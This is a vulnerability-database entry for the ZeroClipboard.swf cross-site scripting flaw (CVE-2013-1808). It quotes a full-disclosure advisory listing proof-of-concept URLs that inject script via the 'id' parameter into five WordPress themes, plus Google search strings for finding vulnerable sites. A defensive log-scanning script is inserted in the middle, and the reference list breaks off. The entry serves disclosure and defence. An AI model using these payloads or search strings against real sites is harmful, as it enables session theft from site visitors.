ZeroClipboard 'ZeroClipboard10.swf' Cross-Site Scripting Vulnerability

Vulnerability ID: 1168940    Vulnerability type: Cross-site scripting
Published: 2013-03-02    Updated: 2015-03-19
CVE: CVE-2013-1808    CNNVD-ID: CNNVD-201303-038
Platform: N/A    CVSS score: 4.3
|Vulnerability sources
https://www.securityfocus.com/bid/58257
https://cxsecurity.com/issue/WLB-2013040066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201303-038
|Vulnerability details
Cross-site scripting vulnerability in ZeroClipboard.swf and ZeroClipboard10.swf in ZeroClipboard before 1.0.8, as used in em-shorty, RepRapCalculator, Fulcrum, Django, aCMS and other products, allows remote attackers to inject arbitrary web script or HTML via the 'id' parameter.
|Vulnerability EXP
Hello list!

These are Cross-Site Scripting and Full path disclosure vulnerabilities in 
multiple themes for WordPress (with ZeroClipboard.swf).

Earlier I wrote about Cross-Site Scripting vulnerabilities in 
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote 
that this is a very widespread flash file and it is placed on tens of thousands 
of web sites. And it's used in hundreds of web applications.

After publishing this and two other advisories related to ZeroClipboard in 
February, last month I published two new advisories (which I prepared in 
February) about vulnerabilities in WP plugins and in WP themes (with 
ZeroClipboard.swf).

This flash file is used in hundreds of themes for WordPress (including 
custom themes for different sites). Among them are Montezuma, Striking, 
Couponpress, Azolla, Black and White. And there are many other vulnerable 
themes for WP with ZeroClipboard.swf. There is also one theme which 
contains ZeroClipboard10.swf as well.

SecurityVulns ID: 12910
CVE: CVE-2013-1808

-------------------------
Affected products:
-------------------------

The following web applications (WordPress themes) with ZeroClipboard are 
vulnerable:

All versions of Montezuma, Striking, Couponpress, Azolla, Black and White.

Both XSS vulnerabilities in ZeroClipboard are fixed in the latest version, 
ZeroClipboard 1.1.7. All developers should update the swf file in their 
software. I wrote about the developers who began fixing these vulnerabilities in 
ZeroClipboard in their software 
(http://seclists.org/fulldisclosure/2013/Mar/207).

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into buffer (as described 
in previous advisory).

http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

This is a very widespread flash file (both versions), as you can find out via 
Google dorks. If searching with the standard Google dork makes it possible to find 
tens of thousands of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then 
searching for WordPress themes makes it possible to find hundreds of 
thousands of sites with these flash files.

inurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in 
February, now more)
zeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now 
more)

Full path disclosure (WASC-13):

All mentioned themes have FPD vulnerabilities in php files (in index.php and 
others), which is typical for WP themes.

http://site/wp-content/themes/montezuma/

http://site/wp-content/themes/striking/

http://site/wp-content/themes/couponpress/

http://site/wp-content/themes/azolla/

http://site/wp-content/themes/black-and-white/

------------
Timeline:
------------

2013.02.19 - after contacting the old and new developers of ZeroClipboard, 
I disclosed the vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about 
vulnerabilities in different web applications with ZeroClipboard to draw 
more attention to this issue, which concerns hundreds of web applications.
2013.03.28 - disclosed the vulnerabilities in multiple themes for WordPress at 
my site (http://websecurity.com.ua/6401/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
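The advisory above describes XSS through the `id` query parameter of ZeroClipboard.swf / ZeroClipboard10.swf. As an added example (not part of the advisory or of the ZeroClipboard project), the script below triages web-server access logs from the defender's side: it finds requests for either swf whose `id` value does not look like a plain DOM element id. The allowlist regex and the Combined Log Format sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2013:10:01:02 +0000] "GET /wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=copy_btn_1&width=80&height=20 HTTP/1.1" 200 1024
203.0.113.7 - - [28/Mar/2013:10:01:09 +0000] "GET /wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))%7D%3B%2F%2F&width&height HTTP/1.1" 200 1024
203.0.113.9 - - [28/Mar/2013:10:02:30 +0000] "GET /wp-content/themes/azolla/style.css HTTP/1.1" 200 2048
203.0.113.11 - - [28/Mar/2013:10:03:00 +0000] "GET /js/ZeroClipboard10.swf?id=%3Cscript%3E HTTP/1.1" 404 512
"""

# Minimal Combined Log Format parser: client, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Both file names from the advisory, matched case-insensitively at the end of the path.
SWF_RE = re.compile(r'/zeroclipboard(?:10)?\.swf$', re.IGNORECASE)
# Assumed safe shape for a DOM element id (assumption for this example,
# not ZeroClipboard's own validation).
SAFE_ID_RE = re.compile(r'^[A-Za-z0-9_-]{1,64}$')


def flag_request(line):
    """Return a finding for a ZeroClipboard*.swf request with an unsafe id, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line: skip rather than guess
    parts = urlsplit(m.group('url'))
    if not SWF_RE.search(parts.path):
        return None
    # parse_qs percent-decodes once; blank values (width&height) are kept.
    ids = parse_qs(parts.query, keep_blank_values=True).get('id', [])
    bad = [v for v in ids if not SAFE_ID_RE.match(v)]
    if not bad:
        return None
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'path': parts.path,
            'status': m.group('status'), 'id_values': bad}


def scan_log(text):
    """Scan a whole log and return the list of findings in log order."""
    return [f for f in (flag_request(l) for l in text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 404 still counts as a finding: a probe against a path the site does not serve is worth correlating with the other requests from that client.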

|References

Source: github.com
Link: https://github.com/jonrohan/ZeroClipboard/commit/a0e02933f5f7ce5f364fbad36a005f0a349f0696
Source: github.com
Link: https://github.com/jonrohan/ZeroClipboard/blob/master/docs/releases.md#zeroclipboard-108
Source: BID
Name: 58257
Link: http://www.securityfocus.com/bid/58257
Source: MLIST
Name: [oss-security] 20130326 Re: WordPress plugins vulnerable to CVE-2013-1808
Link: http://www.openwall.com/lists/oss-security/2013/03/26/8
Source: MLIST
Name: [oss-security] 20130324 XSS vulnerabilities in ZeroClipboard and multiple web applications
Link: http://www.openwall.com/lists/oss-security/2013/03/25/1
Source: MLIST
Name: [oss-security] 20130310 WordPress plugins vulnerable to CVE-2013-1808
Link: http://www.openwall.com/lists/oss-security/2013/03/10/2
Source: MLIST
Name: [oss-security] 20130302 Re: [Full-disclosure] XSS vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS - ZeroClipboard.swf
Link: http://www.openwall.com/lists/oss-security/2013/03/03/3
Source: securityvulns.ru
Link: http://securityvulns.ru/docs29105.html
Source: securityvulns.ru
Link: http://securityvu